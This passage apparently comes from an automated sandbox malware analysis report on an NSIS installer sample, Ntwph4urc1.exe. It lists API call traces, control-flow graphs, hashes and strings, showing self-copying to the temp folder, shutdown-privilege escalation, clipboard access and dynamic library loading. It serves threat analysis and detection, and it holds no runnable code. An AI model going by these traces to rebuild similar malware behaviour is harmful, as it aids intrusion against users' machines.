                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                              • ExitProcess.KERNEL32 ref: 00403837
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                              • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ntwph4urc1.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                              • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                              • ExitProcess.KERNEL32 ref: 004039DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                              • API String ID: 3441113951-563296119
                                              • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                              • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                              • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                              • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                              Function 00405595 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 139 405595-4055b0 140 4055b6-40567d GetDlgItem * 3 call 404379 call 404cd2 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40573f-405746 139->141 162 40569b-40569e 140->162 163 40567f-405699 SendMessageW * 2 140->163 143 405770-40577d 141->143 144 405748-40576a GetDlgItem CreateThread CloseHandle 141->144 146 40579b-4057a5 143->146 147 40577f-405785 143->147 144->143 151 4057a7-4057ad 146->151 152 4057fb-4057ff 146->152 149 4057c0-4057c9 call 4043ab 147->149 150 405787-405796 ShowWindow * 2 call 404379 147->150 159 4057ce-4057d2 149->159 150->146 157 4057d5-4057e5 ShowWindow 151->157 158 4057af-4057bb call 40431d 151->158 152->149 155 405801-405807 152->155 155->149 164 405809-40581c SendMessageW 155->164 160 4057f5-4057f6 call 40431d 157->160 161 4057e7-4057f0 call 405456 157->161 158->149 160->152 161->160 168 4056a0-4056ac SendMessageW 162->168 169 4056ae-4056c5 call 404344 162->169 163->162 170 405822-40584d CreatePopupMenu call 40642b AppendMenuW 164->170 171 40591e-405920 164->171 168->169 178 4056c7-4056db ShowWindow 169->178 179 4056fb-40571c GetDlgItem SendMessageW 169->179 176 405862-405877 TrackPopupMenu 170->176 177 40584f-40585f GetWindowRect 170->177 171->159 176->171 181 40587d-405894 176->181 177->176 182 4056ea 178->182 183 4056dd-4056e8 ShowWindow 178->183 179->171 180 405722-40573a SendMessageW * 2 179->180 180->171 184 405899-4058b4 SendMessageW 181->184 185 4056f0-4056f6 call 404379 182->185 183->185 184->184 186 4058b6-4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058db-405902 SendMessageW 186->188 188->188 189 405904-405918 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                              • GetClientRect.USER32(?,?), ref: 0040563F
                                              • GetSystemMetrics.USER32(00000002), ref: 00405646
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                              • ShowWindow.USER32(?,00000008), ref: 004056E2
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                              • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                              • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                              • ShowWindow.USER32(00000000), ref: 0040578E
                                              • ShowWindow.USER32(?,00000008), ref: 00405793
                                              • ShowWindow.USER32(00000008), ref: 004057DD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                              • CreatePopupMenu.USER32 ref: 00405822
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                              • GetWindowRect.USER32(?,?), ref: 00405856
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                              • OpenClipboard.USER32(00000000), ref: 004058B7
                                              • EmptyClipboard.USER32 ref: 004058BD
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                              • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                              • CloseClipboard.USER32 ref: 00405918
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                              • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                              • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                              • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                              Function 73F51B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 73F5121B: GlobalAlloc.KERNEL32(00000040,?,73F5123B,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F51225
                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73F51C8D
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73F51CD5
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73F51CDF
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51CF2
                                              • GlobalFree.KERNEL32(?), ref: 73F51DD4
                                              • GlobalFree.KERNEL32(?), ref: 73F51DD9
                                              • GlobalFree.KERNEL32(?), ref: 73F51DDE
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51FC8
                                              • lstrcpyW.KERNEL32(?,?), ref: 73F52182
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 73F52201
                                              • LoadLibraryW.KERNEL32(00000008), ref: 73F52212
                                              • GetProcAddress.KERNEL32(?,?), ref: 73F5226C
                                              • lstrlenW.KERNEL32(00000808), ref: 73F52286
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: 30d8e6e7d9ccce055acd7e39682cc9e998c16f4471546fa32e25b39f27f97fe4
                                              • Instruction ID: fb91855c2f5d0efd1cde8e7c47737a0f3719c06dffc6e6d0f38138359feae2d9
                                              • Opcode Fuzzy Hash: 30d8e6e7d9ccce055acd7e39682cc9e998c16f4471546fa32e25b39f27f97fe4
                                              • Instruction Fuzzy Hash: 4B22AA72D10A0AEBDF11DFA4C9807EEB7F5FB04385F24462EE166E2290D774A681CB50
                                              Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 656 405b00-405b26 call 405dcb 659 405b28-405b3a DeleteFileW 656->659 660 405b3f-405b46 656->660 661 405cbc-405cc0 659->661 662 405b48-405b4a 660->662 663 405b59-405b69 call 4063ee 660->663 664 405b50-405b53 662->664 665 405c6a-405c6f 662->665 669 405b78-405b79 call 405d0f 663->669 670 405b6b-405b76 lstrcatW 663->670 664->663 664->665 665->661 668 405c71-405c74 665->668 671 405c76-405c7c 668->671 672 405c7e-405c86 call 40674c 668->672 673 405b7e-405b82 669->673 670->673 671->661 672->661 680 405c88-405c9c call 405cc3 call 405ab8 672->680 676 405b84-405b8c 673->676 677 405b8e-405b94 lstrcatW 673->677 676->677 679 405b99-405bb5 lstrlenW FindFirstFileW 676->679 677->679 682 405bbb-405bc3 679->682 683 405c5f-405c63 679->683 696 405cb4-405cb7 call 405456 680->696 697 405c9e-405ca1 680->697 686 405be3-405bf7 call 4063ee 682->686 687 405bc5-405bcd 682->687 683->665 685 405c65 683->685 685->665 698 405bf9-405c01 686->698 699 405c0e-405c19 call 405ab8 686->699 688 405c42-405c52 FindNextFileW 687->688 689 405bcf-405bd7 687->689 688->682 695 405c58-405c59 FindClose 688->695 689->686 692 405bd9-405be1 689->692 692->686 692->688 695->683 696->661 697->671 700 405ca3-405cb2 call 405456 call 4061b4 697->700 698->688 701 405c03-405c0c call 405b00 698->701 709 405c3a-405c3d call 405456 699->709 710 405c1b-405c1e 699->710 700->661 701->688 709->688 713 405c20-405c30 call 405456 call 4061b4 710->713 714 405c32-405c38 710->714 713->688 714->688
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                              • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                              • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                              • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                              • FindClose.KERNEL32(00000000), ref: 00405C59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                              • API String ID: 2035342205-2179773686
                                              • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                              • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                              • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                              • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                              Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,007A4F98,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                              • FindClose.KERNEL32(00000000), ref: 00406763
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, xrefs: 0040674C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp
                                              • API String ID: 2295610775-2176574564
                                              • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                              • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                              • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                              • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC
                                              Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 190 403e6b-403e7d 191 403e83-403e89 190->191 192 403fbe-403fcd 190->192 191->192 195 403e8f-403e98 191->195 193 40401c-404031 192->193 194 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 192->194 199 404071-404076 call 404390 193->199 200 404033-404036 193->200 194->193 196 403e9a-403ea7 SetWindowPos 195->196 197 403ead-403eb0 195->197 196->197 201 403eb2-403ec4 ShowWindow 197->201 202 403eca-403ed0 197->202 212 40407b-404096 199->212 204 404038-404043 call 401389 200->204 205 404069-40406b 200->205 201->202 207 403ed2-403ee7 DestroyWindow 202->207 208 403eec-403eef 202->208 204->205 227 404045-404064 SendMessageW 204->227 205->199 211 404311 205->211 215 4042ee-4042f4 207->215 218 403ef1-403efd SetWindowLongW 208->218 219 403f02-403f08 208->219 217 404313-40431a 211->217 213 404098-40409a call 40140b 212->213 214 40409f-4040a5 212->214 213->214 223 4040ab-4040b6 214->223 224 4042cf-4042e8 DestroyWindow EndDialog 214->224 215->211 222 4042f6-4042fc 215->222 218->217 225 403fab-403fb9 call 4043ab 219->225 226 403f0e-403f1f GetDlgItem 219->226 222->211 228 4042fe-404307 ShowWindow 222->228 223->224 229 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 223->229 224->215 225->217 230 403f21-403f38 SendMessageW IsWindowEnabled 226->230 231 403f3e-403f41 226->231 227->217 228->211 260 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 229->260 261 40410b-404110 229->261 230->211 230->231 234 403f43-403f44 231->234 235 403f46-403f49 231->235 238 403f74-403f79 call 40431d 234->238 239 403f57-403f5c 235->239 240 403f4b-403f51 235->240 238->225 241 403f92-403fa5 SendMessageW 239->241 242 403f5e-403f64 239->242 240->241 245 403f53-403f55 240->245 241->225 246 403f66-403f6c call 40140b 242->246 247 403f7b-403f84 call 40140b 242->247 245->238 256 403f72 246->256 247->225 257 403f86-403f90 247->257 256->238 257->256 264 404151-404152 260->264 265 404154 260->265 261->260 266 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404186-404197 SendMessageW 266->267 268 404199 266->268 269 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 267->269 268->269 269->212 280 4041e4-4041e6 269->280 280->212 281 4041ec-4041f0 280->281 282 4041f2-4041f8 281->282 283 40420f-404223 DestroyWindow 281->283 282->211 284 4041fe-404204 282->284 283->215 285 404229-404256 CreateDialogParamW 283->285 284->212 286 40420a 284->286 285->215 287 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 4042b5-4042c8 ShowWindow call 404390 287->292 294 4042cd 292->294 294->215
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                              • ShowWindow.USER32(?), ref: 00403EC4
                                              • DestroyWindow.USER32 ref: 00403ED8
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                              • GetDlgItem.USER32(?,?), ref: 00403F15
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                              • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                              • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                              • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                              • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                              • ShowWindow.USER32(00000000,?), ref: 0040411A
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                              • EnableWindow.USER32(?,?), ref: 00404147
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                              • EnableMenuItem.USER32(00000000), ref: 00404164
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                              • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                              • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                              • ShowWindow.USER32(?,0000000A), ref: 00404301
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
